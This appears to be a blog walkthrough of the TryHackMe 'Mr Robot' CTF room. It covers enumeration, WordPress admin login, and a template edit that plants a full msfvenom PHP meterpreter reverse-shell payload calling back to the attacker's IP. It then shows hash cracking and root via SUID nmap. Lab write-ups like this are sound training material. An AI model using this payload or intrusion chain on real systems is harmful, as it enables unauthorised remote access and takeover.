TryHackMe

TryHackMe – Mr Robot CTF

Room Link: https://tryhackme.com/room/mrrobot

IP: 10.10.219.74

Enumeration

Nmap

# first lets run an nmap scan on the common 1000 ports
nmap 10.10.219.74 -v -A
All 1000 scanned ports on 10.10.219.74 are filtered

Nmap was not much help here. I navigated to the IP in my browser and luckily found a webserver running on port 80 with it’s own ‘terminal’ (website was styled like a terminal with some commands).

I re-ran an nmap scan just on port 80, and it returned back it is running Apache, so probably a Linux box:

nmap 10.10.219.74 -p80 -O -A
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Linux 5.4 (90%)

GoBuster – Brute Force Directory

I am going to run a gobuster scan as well just to make sure there is nothing hiding in the web directory:

gobuster dir -u 10.10.219.74 -w /usr/share/wordlists/dirb/common.txt

Meanwhile, I have played around with some of the commands in the UI of the website, I noticed whatever command you typed was posted in the url like /join. I tried typing /ls and got an error page for a wordpress website. So now we know we are running some variant of WordPress. When running the join command, it asks for an email. I tried setting up a temporary email box to see if anything would be sent to it, but nothing was.

Fortunately, our gobuster results finished and we got quite a lot of results:

┌──(kali㉿kali)-[~/thm]
└─$ gobuster dir -u 10.10.219.74 -w /usr/share/wordlists/dirb/common.txt                         1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     <http://10.10.219.74>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/03/31 12:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 213]
/.htaccess            (Status: 403) [Size: 218]
/.htpasswd            (Status: 403) [Size: 218]
/0                    (Status: 301) [Size: 0] [--> <http://10.10.219.74/0/>]
/admin                (Status: 301) [Size: 234] [--> <http://10.10.219.74/admin/>]
/atom                 (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/atom/>]
/audio                (Status: 301) [Size: 234] [--> <http://10.10.219.74/audio/>]  
/blog                 (Status: 301) [Size: 233] [--> <http://10.10.219.74/blog/>]   
/css                  (Status: 301) [Size: 232] [--> <http://10.10.219.74/css/>]    
/dashboard            (Status: 302) [Size: 0] [--> <http://10.10.219.74/wp-admin/>] 
/favicon.ico          (Status: 200) [Size: 0]                                     
/feed                 (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/>]     
/image                (Status: 301) [Size: 0] [--> <http://10.10.219.74/image/>]    
/Image                (Status: 301) [Size: 0] [--> <http://10.10.219.74/Image/>]    
/images               (Status: 301) [Size: 235] [--> <http://10.10.219.74/images/>] 
/index.html           (Status: 200) [Size: 1188]                                  
/index.php            (Status: 301) [Size: 0] [--> <http://10.10.219.74/>]          
/js                   (Status: 301) [Size: 231] [--> <http://10.10.219.74/js/>]     
/intro                (Status: 200) [Size: 516314]                                
/license              (Status: 200) [Size: 309]                                   
/login                (Status: 302) [Size: 0] [--> <http://10.10.219.74/wp-login.php>]
/page1                (Status: 301) [Size: 0] [--> <http://10.10.219.74/>]            
/phpmyadmin           (Status: 403) [Size: 94]                                      
/rdf                  (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/rdf/>]   
/readme               (Status: 200) [Size: 64]                                      
/robots               (Status: 200) [Size: 41]                                      
/robots.txt           (Status: 200) [Size: 41]                                      
/rss                  (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/>]       
/rss2                 (Status: 301) [Size: 0] [--> <http://10.10.219.74/feed/>]       
/sitemap              (Status: 200) [Size: 0]                                       
/sitemap.xml          (Status: 200) [Size: 0]                                       
/video                (Status: 301) [Size: 234] [--> <http://10.10.219.74/video/>]    
/wp-admin             (Status: 301) [Size: 237] [--> <http://10.10.219.74/wp-admin/>] 
/wp-content           (Status: 301) [Size: 239] [--> <http://10.10.219.74/wp-content/>]
/wp-config            (Status: 200) [Size: 0]                                        
/wp-includes          (Status: 301) [Size: 240] [--> <http://10.10.219.74/wp-includes/>]
/wp-cron              (Status: 200) [Size: 0]                                         
/wp-load              (Status: 200) [Size: 0]                                         
/wp-links-opml        (Status: 200) [Size: 227]                                       
/wp-login             (Status: 200) [Size: 2606]                                      
/wp-mail              (Status: 500) [Size: 3064]                                      
/wp-settings          (Status: 500) [Size: 0]                                         
/wp-signup            (Status: 302) [Size: 0] [--> <http://10.10.219.74/wp-login.php?action=register>]
/xmlrpc               (Status: 405) [Size: 42]                                                      
/xmlrpc.php           (Status: 405) [Size: 42]                                                      
                                                                                                    
===============================================================
2021/03/31 12:53:00 Finished
===============================================================

Gobuster Results Notes

  • /admin – Redirect loop
  • /sitemap & /sitemap.xml – Nothing
  • /wp-login – Takes us to a wordpress login page. Inspecting the source code shows ver 4.3.1 attached to many of the CSS files, so could be a possible attack vector
  • /robots.txt – We can see the location of two files, one is a key! The other seems to be some sort of dictionary / wordlist
  • /phpmyadmin – We cannot login to this, but this alludes we are probably running MySQL (I reran nmap on this port and it does show as mysql, but the port is filtered)
  • /rdf – some sort of feed. It does show WordPress v4.3.1 on here as well.
  • /license – has a base64 encoded string hidden in source code

WP Admin Access

The /license page had a base64 encoded string that appears to be a username and password. I tested this at /wp-admin and it let’s us in! In users, we can see our account as elliot, and another account: mich05654 as a subscriber. As an admin, however, we can try and inject or upload something to give us remote access. Under Appearance > Editor > 404 template, I replaced the PHP code with a payload from msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.6.64.217 LPORT=4444 -4 raw -o payload.php
cat payload.php           
/*<?php /**/ error_reporting(0); $ip = '10.6.64.217'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Now we need to start metasploit up to intercept the meterpreter shell

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.6.64.217
set LPORT 4444
run

Now all we have to do is navigate to /404.php and we receive a hit back on our console! Run shell to gain shell access.

Perusing around, there is a robot user under /home/robot that has key-2-of-3.txt and also the password for the robot account with an md5 hash.

Let’s crack it with John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt robot.txt --format="Raw-MD5"
<redacted> (robot)

Great! We got his password. But if we try to su robot, it tells us we need to run it from a terminal. We need to spawn a bash terminal and we can do that like so:

python -c 'import pty; pty.spawn("/bin/bash")'

And now we can su robot and grab the flag!

PrivEsc

I can only assume the last flag is under the root home directory, so let’s see how to privesc.

I ran this command to find any binaries we can exploit:

find / -type f -a \\( -perm -u+s -o -perm -g+s \\) -exec ls -l {} \\; 2> /dev/null

And one interesting one with a root SUID set is /usr/local/bin/nmap. I looked up nmap on GTFOBins and it says we can spawn an interactive shell using nmap --interactive and then run !sh

It worked! Running whoami shows we are root and the third flag is in the root directory!

Leave a Reply

Your email address will not be published. Required fields are marked *